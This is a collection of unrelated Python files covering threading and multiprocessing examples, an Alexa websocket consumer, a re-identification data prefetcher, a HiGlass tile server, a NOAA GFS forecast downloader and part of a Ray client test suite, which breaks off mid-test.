givenbox(config) # given image, boxes, get the mask output
elif config.mode == "videofeat":
videofeat(config)
else:
raise Exception("mode %s not supported"%(config.mode))
if config.log_time_and_gpu:
end_time = time.time()
print("total run time %s (%s), log gpu utilize every %s seconds and get median %.2f%% and average %.2f%%. GPU temperature median %.2f and average %.2f (C)" % (
sec2time(end_time - start_time),
end_time - start_time,
gpu_log_interval,
np.median(gpu_util_logs)*100,
np.mean(gpu_util_logs)*100,
np.median(gpu_temp_logs),
np.mean(gpu_temp_logs),
))
|
item_38.py
|
#!/usr/bin/env python3
# Copyright 2014 Brett Slatkin, Pearson Education Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Preamble to mimick book environment
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Example 1
class Counter(object):
def __init__(self):
self.count = 0
def increment(self, offset):
self.count += offset
# Example 2
def worker(sensor_index, how_many, counter):
# I have a barrier in here so the workers synchronize
# when they start counting, otherwise it's hard to get a race
# because the overhead of starting a thread is high.
BARRIER.wait()
for _ in range(how_many):
# Read from the sensor
counter.increment(1)
# Example 3
from threading import Barrier, Thread
BARRIER = Barrier(5)
def run_threads(func, how_many, counter):
threads = []
for i in range(5):
args = (i, how_many, counter)
thread = Thread(target=func, args=args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# Example 4
how_many = 10**5
counter = Counter()
run_threads(worker, how_many, counter)
print('Counter should be %d, found %d' %
(5 * how_many, counter.count))
# Example 5
offset = 5
counter.count += offset
# Example 6
value = getattr(counter, 'count')
result = value + offset
setattr(counter, 'count', result)
# Example 7
# Running in Thread A
value_a = getattr(counter, 'count')
# Context switch to Thread B
value_b = getattr(counter, 'count')
result_b = value_b + 1
setattr(counter, 'count', result_b)
# Context switch back to Thread A
result_a = value_a + 1
setattr(counter, 'count', result_a)
# Example 8
from threading import Lock
class LockingCounter(object):
def __init__(self):
self.lock = Lock()
self.count = 0
def increment(self, offset):
with self.lock:
self.count += offset
# Example 9
BARRIER = Barrier(5)
counter = LockingCounter()
run_threads(worker, how_many, counter)
print('Counter should be %d, found %d' %
(5 * how_many, counter.count))
|
consumers.py
|
import json
import threading
from alexa_client import AlexaClient
from channels.generic.websocket import WebsocketConsumer
from requests.exceptions import HTTPError
from django.conf import settings
from alexa_browser_client import constants, helpers
class AuthenticationError(IOError):
pass
class MissingRefreshToken(AuthenticationError):
pass
class AuthenticationFailed(AuthenticationError):
pass
class AlexaClientMixin:
alexa_client_class = AlexaClient
def connect(self):
super().connect()
self.send_status(constants.CONNECTING)
self.alexa_client = self.alexa_client_class(
client_id=settings.ALEXA_BROWSER_CLIENT_AVS_CLIENT_ID,
secret=settings.ALEXA_BROWSER_CLIENT_AVS_CLIENT_SECRET,
refresh_token=self.refresh_token,
)
try:
self.handle_alexa_connect()
except AuthenticationError:
self.close(code=3000)
def handle_alexa_connect(self):
if not self.refresh_token:
raise MissingRefreshToken()
else:
try:
self.alexa_client.connect()
except HTTPError:
raise AuthenticationFailed()
@property
def refresh_token(self):
if not self.scope['session']:
return None
return self.scope['session'].get(constants.SESSION_KEY_REFRESH_TOKEN)
def disconnect(self, *args, **kwargs):
self.alexa_client.ping_manager.cancel()
return super().disconnect(*args, **kwargs)
class LifecycleMixin:
audio_lifecycle_class = helpers.AudioLifecycle
def connect(self):
super().connect()
self.send_status(constants.EXPECTING_WAKEWORD)
self.audio_lifecycle = self.audio_lifecycle_class(
on_command_started=self.handle_command_started,
on_command_finished=self.handle_command_finished,
)
def receive(self, text_data=None, bytes_data=None):
super().receive(text_data=text_data, bytes_data=bytes_data)
self.audio_lifecycle.extend_audio(bytes_data)
def handle_command_started(self):
self.send_status(constants.EXPECTING_COMMAND)
def handle_command_finished(self):
self.send_status(constants.EXPECTING_WAKEWORD)
class AlexaConsumer(LifecycleMixin, AlexaClientMixin, WebsocketConsumer):
dialog_request_id = None
def receive(self, text_data=None, bytes_data=None):
if text_data == 'ExpectSpeech':
self.audio_lifecycle.handle_command_started(None)
else:
super().receive(text_data=text_data, bytes_data=bytes_data)
def send_status(self, message_id):
self.send(text_data=json.dumps({'type': message_id}))
def handle_command_started(self, wakeword_name):
super().handle_command_started()
thr = threading.Thread(target=self.send_command_to_avs)
thr.start()
def send_command_to_avs(self):
directives = self.alexa_client.send_audio_file(
self.audio_lifecycle.as_file,
dialog_request_id=self.dialog_request_id
)
self.dialog_request_id = None
for directive in (directives or []):
if directive.name == 'ExpectSpeech':
headers = directive.directive['header']
self.dialog_request_id = headers['dialogRequestId']
self.send_status('ExpectSpeech')
if directive.name in ['Speak', 'Play']:
self.send(bytes_data=directive.audio_attachment)
else:
self.send_status(constants.EXPECTING_WAKEWORD)
|
Prefetcher.py
|
import threading
import Queue
import time
import random
import os.path as osp
import numpy as np
from PIL import Image
from ..utils.dataset_utils import parse_im_name
#ospj = osp.join
ospeu = osp.expanduser
# from TrainSet import Trainset.pre_process_im
class Counter(object):
"""A thread safe counter."""
def __init__(self, val=0, max_val=0):
self._value = val
self.max_value = max_val
self._lock = threading.Lock()
def reset(self):
with self._lock:
self._value = 0
def set_max_value(self, max_val):
self.max_value = max_val
def increment(self):
with self._lock:
if self._value < self.max_value:
self._value += 1
incremented = True
else:
incremented = False
return incremented, self._value
def get_value(self):
with self._lock:
return self._value
class Enqueuer(object):
def __init__(self, get_element, num_elements, num_threads=1, queue_size=20):
"""
Args:
get_element: a function that takes a pointer and returns an element
num_elements: total number of elements to put into the queue
num_threads: num of parallel threads, >= 1
queue_size: the maximum size of the queue. Set to some positive integer
to save memory, otherwise, set to 0.
"""
self.get_element = get_element
assert num_threads > 0
self.num_threads = num_threads
self.queue_size = queue_size
self.queue = Queue.Queue(maxsize=queue_size)
# The pointer shared by threads.
self.ptr = Counter(max_val=num_elements)
# The event to wake up threads, it's set at the beginning of an epoch.
# It's cleared after an epoch is enqueued or when the states are reset.
self.event = threading.Event()
# To reset states.
self.reset_event = threading.Event()
# The event to terminate the threads.
self.stop_event = threading.Event()
self.threads = []
for _ in range(num_threads):
thread = threading.Thread(target=self.enqueue)
# Set the thread in daemon mode, so that the main program ends normally.
thread.daemon = True
thread.start()
self.threads.append(thread)
def start_ep(self):
"""Start enqueuing an epoch."""
self.event.set()
def end_ep(self):
"""When all elements are enqueued, let threads sleep to save resources."""
self.event.clear()
self.ptr.reset()
def reset(self):
"""Reset the threads, pointer and the queue to initial states. In common
case, this will not be called."""
self.reset_event.set()
self.event.clear()
# wait for threads to pause. This is not an absolutely safe way. The safer
# way is to check some flag inside a thread, not implemented yet.
time.sleep(5)
self.reset_event.clear()
self.ptr.reset()
self.queue = Queue.Queue(maxsize=self.queue_size)
def set_num_elements(self, num_elements):
"""Reset the max number of elements."""
self.reset()
self.ptr.set_max_value(num_elements)
'''
#m_dict = TrainSet.get_im_dict()
im_list = list(im_dict.values())
for _ in range(int(self.batch_size/self.images_per_id)):
if self.ptr >= self.dataset_size:
self.epoch_done = True
break
else:
if self.id_ptr >= self.id_number:
self.id_ptr = 0
if len(im_list[self.id_ptr]) < self.images_per_id:
for i in range(self.image_per_id):
im_name = random.sample(im_list[self.id_ptr],1)
im_path = osp.join(self.im_dir, im_name)
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name, 'id')
label = self.ids2labels[id]
sample = (im,im_name,label,mirrored)
samples.append(sample)
else:
im_names = random.sample(im_list[self.id_ptr],self.images_per_id)
for j in range(self.image_per_id):
im_path = osp.join(self.im_dir, im_names[j])
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name[j], 'id')
label = self.ids2labels[id]
sample = (im, im_name[j], label, mirrored)
samples.append(sample)
self.id_ptr +=1
self.ptr += self.images_per_id self.ptr.set_max_value(num_elements)
'''
def stop(self):
"""Wait for threads to terminate."""
self.stop_event.set()
for thread in self.threads:
thread.join()
def enqueue(self):
while not self.stop_event.isSet():
# If the enqueuing event is not set, the thread just waits.
if not self.event.wait(0.5):
continue
# Increment the counter to claim that this element has been enqueued by
# this thread.
incremented, ptr = self.ptr.increment()
if incremented:
element = self.get_element(ptr - 1)
# When enqueuing, keep an eye on the stop and reset signal.
while not self.stop_event.isSet() and not self.reset_event.isSet():
try:
# This operation will wait at most `timeout` for a free slot in
# the queue to be available.
self.queue.put(element, timeout=0.5)
break
except:
pass
else:
self.end_ep()
print('Exiting thread {}!!!!!!!!'.format(
threading.current_thread().name))
class Prefetcher(object):
"""This helper class enables sample enqueuing and batch dequeuing, to speed
up batch fetching. It abstracts away the enqueuing and dequeuing logic."""
def __init__(self, get_sample, pre_process_im, dataset_size, batch_size, final_batch=True,
num_threads=1, prefetch_size=200):
"""
Args:
get_sample: a function that takes a pointer (index) and returns a sample
dataset_size: total number of samples in the dataset
final_batch: True or False, whether to keep or drop the final incomplete
batch
num_threads: num of parallel threads, >= 1
prefetch_size: the maximum size of the queue. Set to some positive integer
to save memory, otherwise, set to 0.
"""
self.full_dataset_size = dataset_size
self.final_batch = final_batch
final_sz = self.full_dataset_size % batch_size
if not final_batch:
dataset_size = self.full_dataset_size - final_sz
self.dataset_size = dataset_size
self.batch_size = batch_size
#self.dataset = name
self.enqueuer = Enqueuer(get_element=get_sample, num_elements=dataset_size,
num_threads=num_threads, queue_size=prefetch_size)
# The pointer indicating whether an epoch has been fetched from the queue
#self.get_sample = get_sample
self.pre_process_im = pre_process_im
self.ptr = 0
self.ep_done = True
# self.id_number = 2533
self.id_ptr = 0
self.images_per_id = 8
#self.im_dir = ospeu('/data2/reid-public/Dataset/pcb-format/{}/images'.format(self.dataset))
def set_batch_size(self, batch_size):
"""You had better change batch size at the beginning of a new epoch."""
final_sz = self.full_dataset_size % batch_size
if not self.final_batch:
self.dataset_size = self.full_dataset_size - final_sz
self.enqueuer.set_num_elements(self.dataset_size)
self.batch_size = batch_size
self.ep_done = True
def next_batch_test(self):
"""Return a batch of samples, meanwhile indicate whether the epoch is
done. The purpose of this func is mainly to abstract away the loop and the
boundary-checking logic.
Returns:
samples: a list of samples
done: bool, whether the epoch is done
"""
# Start enqueuing and other preparation at the beginning of an epoch.
if self.ep_done:
self.start_ep_prefetching()
# Whether an epoch is done.
self.ep_done = False
samples = []
for _ in range(self.batch_size):
# Indeed, `>` will not occur.
if self.ptr >= self.dataset_size:
self.ep_done = True
break
else:
self.ptr += 1
sample = self.enqueuer.queue.get()
# print('queue size {}'.format(self.enqueuer.queue.qsize()))
samples.append(sample)
# print 'queue size: {}'.format(self.enqueuer.queue.qsize())
# Indeed, `>` will not occur.
if self.ptr >= self.dataset_size:
self.ep_done = True
return samples, self.ep_done
def next_batch(self, im_dict, ids2labels, im_dir):
"""Return a batch of samples, meanwhile indicate whether the epoch is
done. The purpose of this func is mainly to abstract away the loop and the
boundary-checking logic.
Returns:
samples: a list of samples
done: bool, whether the epoch is done
"""
# Start enqueuing and other preparation at the beginning of an epoch.
if self.ep_done:
self.start_ep_prefetching()
# Whether an epoch is done.
self.ep_done = False
samples = []
#im_dict = TrainSet.get_im_dict()
im_list = list(im_dict.values())
for _ in range(int(self.batch_size/self.images_per_id)):
if self.ptr >= self.dataset_size:
self.epoch_done = True
break
else:
if self.id_ptr >= len(im_dict.keys()):
self.id_ptr = 0
if len(im_list[self.id_ptr]) < self.images_per_id:
for i in range(self.images_per_id):
im_name = random.sample(im_list[self.id_ptr], 1)
im_path = osp.join(im_dir, im_name[0])
# print im_dir
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name[0], 'id')
label = ids2labels[id]
sample = (im, im_name[0], label, mirrored)
samples.append(sample)
else:
im_names = random.sample(
im_list[self.id_ptr], self.images_per_id)
for j in range(self.images_per_id):
im_path = osp.join(im_dir, im_names[j])
# print "im_dir is :"
# print im_dir
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_names[j], 'id')
label = ids2labels[id]
#im,label,mirrored = self.get_sample(im_names[j])
sample = (im, im_names[j], label, mirrored)
samples.append(sample)
self.id_ptr += 1
self.ptr += self.images_per_id
'''
for _ in range(self.batch_size):
# Indeed, `>` will not occur.
'''
if self.ptr >= self.dataset_size:
self.ep_done = True
break
else:
self.ptr += 1
sample = self.enqueuer.queue.get()
# print('queue size {}'.format(self.enqueuer.queue.qsize()))
samples.append(sample)
# print 'queue size: {}'.format(self.enqueuer.queue.qsize())
# Indeed, `>` will not occur.
'''
if self.ptr >= self.dataset_size:
self.ep_done = True
return samples, self.ep_done
def start_ep_prefetching(self):
"""
NOTE: Has to be called at the start of every epoch.
"""
self.enqueuer.start_ep()
self.ptr = 0
def stop(self):
"""This can be called to stop threads, e.g. after finishing using the
dataset, or when existing the python main program."""
self.enqueuer.stop()
|
process01.py
|
"""
进程模块使用,基础示例
"""
# 不能选带横线的
import multiprocessing
from time import sleep
a = 1
# 进程执行函数
def fun():
print("开始运行第一个进程")
sleep(2)
global a
print(a)
a = 100 # 打印子进程a
print("第一个进程结束")
# 实例化进程对象
p = multiprocessing.Process(target=fun)
# 启动进程 此刻才会产生进程,运行fun函数
p.start()
print("第二个进程开始运行")
sleep(3)
print("第二个进程结束")
# 阻塞等待回收进程
p.join()
print(a) # 打印父进程的a
|
server.py
|
from functools import partial
from io import StringIO
import multiprocess as mp
import cytoolz as toolz
import os.path as op
import platform
import logging
import logging.handlers
import socket
import tempfile
import json
import time
import os
from flask import Flask
from flask import request, jsonify
# from flask_restful import reqparse, abort, Api, Resource
from flask_cors import CORS
from fuse import FUSE
import requests
import slugid
import sh
__all__ = ["Server"]
OS_NAME = platform.system()
OS_TEMPDIR = tempfile.gettempdir()
# Disable annoying logs from werkzeug server
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
log.disabled = True
# The following line is also needed to turn off all debug logs
os.environ["WERKZEUG_RUN_MAIN"] = "true"
def create_app(name, tilesets, fuse=None):
app = Flask(name)
app.logger.disabled = True
CORS(app)
remote_tilesets = {}
@app.route("/api/v1/")
def hello():
return "Hello World!"
@app.route("/api/v1/register_url/", methods=["POST"])
def register_url():
from higlass.tilesets import by_filetype
js = request.json
if js["filetype"] not in by_filetype:
return (
jsonify({"error": "Unknown filetype: {}".format(js["filetype"])}),
400,
)
if fuse is None:
return jsonify({"error": "httpfs is not available."})
key = (js["fileUrl"], js["filetype"])
if key in remote_tilesets:
ts = remote_tilesets[key]
else:
mounted_url = fuse.get_filepath(js["fileUrl"])
factory = by_filetype[js["filetype"]]
ts = factory(mounted_url)
remote_tilesets[key] = ts
return jsonify({"uid": ts.uuid})
@app.route("/api/v1/available-chrom-sizes/", methods=["GET"])
def available_chrom_sizes():
"""
Get the list of available chromosome size lists. No query parameters.
"""
results = []
for ts in tilesets:
if ts.datatype == "chromsizes":
results.append(ts.meta)
return jsonify({"count": len(results), "results": results})
@app.route("/api/v1/chrom-sizes/", methods=["GET"])
def chrom_sizes():
"""
Coordinate system resource.
Query Parameters
----------------
id : string
Tileset UUID
type : { tsv | json }
Response format. Default is tsv.
cum : boolean
Return cumulative lengths. Default is false.
"""
uuid = request.args.get("id", None)
res_type = request.args.get("type", "tsv")
incl_cum = request.args.get("cum", False)
# filter for tileset
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
if ts is None:
return jsonify({"error": "Not found"}), 404
if not hasattr(ts, "chromsizes"):
return jsonify({"error": "Tileset does not have chrom sizes."})
# list of tuples (chrom, size)
data = ts.chromsizes
if incl_cum:
data, _data, cum = [], data, 0
for chrom, size in _data:
cum += size
data.append((chrom, size, cum))
if res_type == "json":
if incl_cum:
j = {
ts.uuid: {
chrom: {"size": size, "offset": offset}
for chrom, size, offset in data
}
}
else:
j = {ts.uuid: {chrom: {"size": size} for chrom, size in data}}
return jsonify(j)
elif res_type == "tsv":
if incl_cum:
return "\n".join(
"{}\t{}\t{}".format(chrom, size, offset)
for chrom, size, offset in data
)
else:
return "\n".join("{}\t{}".format(chrom, size) for chrom, size in data)
else:
return jsonify({"error": "Unknown response type"}), 500
@app.route("/api/v1/uids_by_filename/", methods=["GET"])
def uids_by_filename():
return jsonify(
{
"count": len(tilesets),
"results": {i: tilesets[i] for i in range(len(tilesets))},
}
)
def _list_tilesets():
return tilesets + list(remote_tilesets.values())
@app.route("/api/v1/tilesets/", methods=["GET"])
def list_tilesets():
tsets = _list_tilesets()
return jsonify(
{
"count": len(tsets),
"next": None,
"previous": None,
"results": [ts.meta for ts in tsets],
}
)
@app.route("/api/v1/tileset_info/", methods=["GET"])
def tileset_info():
uuids = request.args.getlist("d")
info = {}
for uuid in uuids:
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
if ts is not None:
info[uuid] = ts.tileset_info()
else:
info[uuid] = {"error": "No such tileset with uid: {}".format(uuid)}
return jsonify(info)
@app.route("/api/v1/tiles/", methods=["GET"])
def tiles():
tids_requested = set(request.args.getlist("d"))
if not tids_requested:
return jsonify({"error": "No tiles requested"}), 400
extract_uuid = lambda tid: tid.split(".")[0]
uuids_to_tids = toolz.groupby(extract_uuid, tids_requested)
tiles = []
for uuid, tids in uuids_to_tids.items():
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
tiles.extend(ts.tiles(tids))
data = {tid: tval for tid, tval in tiles}
return jsonify(data)
return app
class ServerError(Exception):
pass
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class FuseProcess:
def __init__(self, tmp_dir):
self.tmp_dir = tmp_dir
self.http_directory = op.join(tmp_dir, "http")
self.https_directory = op.join(tmp_dir, "https")
self.diskcache_directory = op.join(tmp_dir, "dc")
def setup(self):
"""
Set up filesystem in user space for http and https
so that we can retrieve tiles from remote sources.
Parameters
----------
tmp_dir: string
The temporary directory where to create the
http and https directories
"""
from simple_httpfs import HttpFs
if not op.exists(self.http_directory):
os.makedirs(self.http_directory)
if not op.exists(self.https_directory):
os.makedirs(self.https_directory)
if not op.exists(self.diskcache_directory):
os.makedirs(self.diskcache_directory)
self.teardown()
disk_cache_size = 2 ** 25
lru_capacity = 400
def start_fuse(directory, protocol):
try:
# This is a bit confusing. I think `fuse` (lowercase) is used
# above in get_filepath() line 50 and 52. If that's not the
# case than this assignment is useless and get_filepath() is
# broken
fuse = FUSE(
HttpFs(
protocol,
disk_cache_size=disk_cache_size,
disk_cache_dir=self.diskcache_directory,
lru_capacity=lru_capacity,
),
directory,
foreground=False,
# allow_other=True
)
except RuntimeError as e:
if str(e) != "1":
raise e
proc1 = mp.Process(target=start_fuse, args=[self.http_directory, "http"])
proc1.start()
proc1.join()
proc2 = mp.Process(target=start_fuse, args=[self.https_directory, "https"])
proc2.start()
proc2.join()
def teardown(self):
try:
if OS_NAME == "Darwin":
sh.umount("HttpFs")
sh.umount(self.http_directory)
else:
sh.fusermount("-uz", self.http_directory)
except Exception:
pass
try:
if OS_NAME == "Darwin":
sh.umount("HttpFs")
sh.umount(self.https_directory)
else:
sh.fusermount("-uz", self.https_directory)
except Exception:
pass
def get_filepath(self, url):
"""
Get the httpfs mount filepath from a url
"""
if url[:7] == "http://":
return self.http_directory + url[6:] + ".."
elif url[:8] == "https://":
return self.https_directory + url[7:] + ".."
else:
raise ValueError("Unsupported URL protocol")
class Server:
"""
A lightweight HiGlass server.
Parameters
----------
tilesets : list
A list of tilesets to serve (see higlass.tilesets)
host : str, optional
The host this server is running on. Usually just localhost.
port : int, optional
The port that this server will run on.
name : str, optional
A name for the Flask app being served. If not provided, a
unique name will be generated. The app's logger inherits this
name.
fuse : bool, optional
Whether to mount http(s) resources using FUSE.
tmp_dir : string, optional
A temporary directory for FUSE to mount the http(s) files and
for caching.
log_level: logging.*
What level to log at
log_file: str, optional
Where to write diagnostic log files. Default is to use a
StringIO stream in memory.
"""
# Keep track of the server processes that have been started.
# So that when someone says 'start', the old ones are terminated
processes = {}
def __init__(
self,
tilesets,
host="localhost",
port=None,
name=None,
fuse=True,
tmp_dir=OS_TEMPDIR,
log_level=logging.INFO,
log_file=None,
):
self.name = name or __name__.split(".")[0] + '-' + slugid.nice()[:8]
self.tilesets = tilesets
self.host = host
self.port = port
if fuse:
self.fuse_process = FuseProcess(op.join(tmp_dir, 'higlass-python'))
self.fuse_process.setup()
else:
self.fuse_process = None
self.app = create_app(self.name, self.tilesets, fuse=self.fuse_process)
if log_file:
self.log = None
handler = logging.handlers.RotatingFileHandler(
log_file, maxBytes=100000, backupCount=1
)
else:
self.log = StringIO()
handler = logging.StreamHandler(self.log)
handler.setLevel(log_level)
self.app.logger.addHandler(handler)
def start(self, debug=False, **kwargs):
"""
Start a lightweight higlass server.
Parameters
----------
debug: bool
Run the server in debug mode. Default is False.
kwargs :
Additional options to pass to app.run
"""
for puid in list(self.processes.keys()):
self.processes[puid].terminate()
del self.processes[puid]
if self.port is None:
self.port = get_open_port()
# we're going to assign a uuid to each server process so that if
# anything goes wrong, the variable referencing the process doesn't get
# lost
uuid = slugid.nice()
target = partial(
self.app.run,
debug=debug,
host=self.host,
port=self.port,
threaded=True,
use_reloader=False,
**kwargs
)
self.processes[uuid] = mp.Process(target=target)
self.processes[uuid].start()
self.connected = False
while not self.connected:
try:
url = "http://{}:{}/api/v1".format(self.host, self.port)
r = requests.head(url)
if r.ok:
self.connected = True
except requests.ConnectionError:
time.sleep(0.2)
def stop(self):
"""
Stop this server so that the calling process can exit
"""
if self.fuse_process is not None:
self.fuse_process.teardown()
for uuid in self.processes:
self.processes[uuid].terminate()
def tileset_info(self, uid):
"""
Return the tileset info for the given tileset
"""
url = "http://{host}:{port}/api/v1/tileset_info/?d={uid}".format(
host=self.host, port=self.port, uid=uid
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching tileset_info:", req.content)
content = json.loads(req.content)
return content[uid]
def tiles(self, uid, z, x, y=None):
"""
Return tiles from the specified dataset (uid) at
the given position (z,x,[u])
"""
tile_id = "{uid}.{z}.{x}".format(uid=uid, z=z, x=x)
if y is not None:
tile_id += ".{y}".format(y=y)
url = "http://{host}:{port}/api/v1/tiles/?d={tile_id}".format(
host=self.host, port=self.port, tile_id=tile_id
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching tile:", req.content)
content = json.loads(req.content)
return content[tile_id]
def chromsizes(self, uid):
"""
Return the chromosome sizes from the given filename
"""
url = "http://{host}:{port}/api/v1/chrom-sizes/?id={uid}".format(
host=self.host, port=self.port, uid=uid
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching chromsizes:", req.content)
return req.content
@property
def api_address(self):
return "http://{host}:{port}/api/v1".format(host=self.host, port=self.port)
|
gfs_retrieve_latest.py
|
#!/usr/bin/env python
from __future__ import print_function
from datetime import datetime, timedelta
from os import makedirs, path
from posixpath import basename
from shutil import copyfileobj
from sys import argv
from tempfile import gettempdir
from threading import Thread
from urllib2 import urlopen
from urlparse import urlsplit
GFS_PATH = argv[1] + path.sep
GFS_FILE = 'http://www.ftp.ncep.noaa.gov/data/nccf/com/gfs/prod/gfs.{0}/gfs.t{1}z.pgrb2.1p00.f{2:03d}'
GFS_CYCLE_BUFFER = 5
if not path.exists(GFS_PATH):
makedirs(GFS_PATH)
def download_grib(path_remote):
grib_remote = urlopen(path_remote)
path_local = GFS_PATH + basename(urlsplit(grib_remote.geturl()).path)
with open(path_local, 'wb') as grib_local:
copyfileobj(grib_remote, grib_local)
cycle = datetime.utcnow() - timedelta(hours=GFS_CYCLE_BUFFER)
if 0 <= cycle.hour < 6:
cycle = cycle.replace(hour=0)
elif 6 <= cycle.hour < 12:
cycle = cycle.replace(hour=6)
elif 12 <= cycle.hour < 18:
cycle = cycle.replace(hour=12)
else:
cycle = cycle.replace(hour=18)
gribs = []
for hour in range(0, 243, 3):
gribs.append(GFS_FILE.format(cycle.strftime('%Y%m%d%H'), cycle.strftime('%H'), hour))
#for hour in range(252, 396, 12):
# gribs.append(GFS_FILE.format(cycle.strftime('%Y%m%d%H'), cycle.strftime('%H'), hour))
threads = []
for grib in gribs:
t = Thread(target=download_grib, args=(grib,))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
|
test_client.py
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import numpy as np
from ray.util.client.common import OBJECT_TRANSFER_CHUNK_SIZE
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get() is False, "Threaded disable_client_hook failed to disable"
assert q.get() is True, "Threaded disable_client_hook failed to re-enable"
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
def test_get_list(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def f():
return "OK"
assert ray.get([]) == []
assert ray.get([f.remote()]) == ["OK"]
get_count = 0
get_stub = ray.worker.server.GetObject
# ray.get() uses unary-unary RPC. Mock the server handler to count
# the number of requests received.
def get(req, metadata=None):
nonlocal get_count
get_count += 1
return get_stub(req, metadata=metadata)
ray.worker.server.GetObject = get
refs = [f.remote() for _ in range(100)]
assert ray.get(refs) == ["OK" for _ in range(100)]
# Only 1 RPC should be sent.
assert get_count == 1
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or (
ready,
remaining,
) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) or (
ready_retval,
remaining_retval,
) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
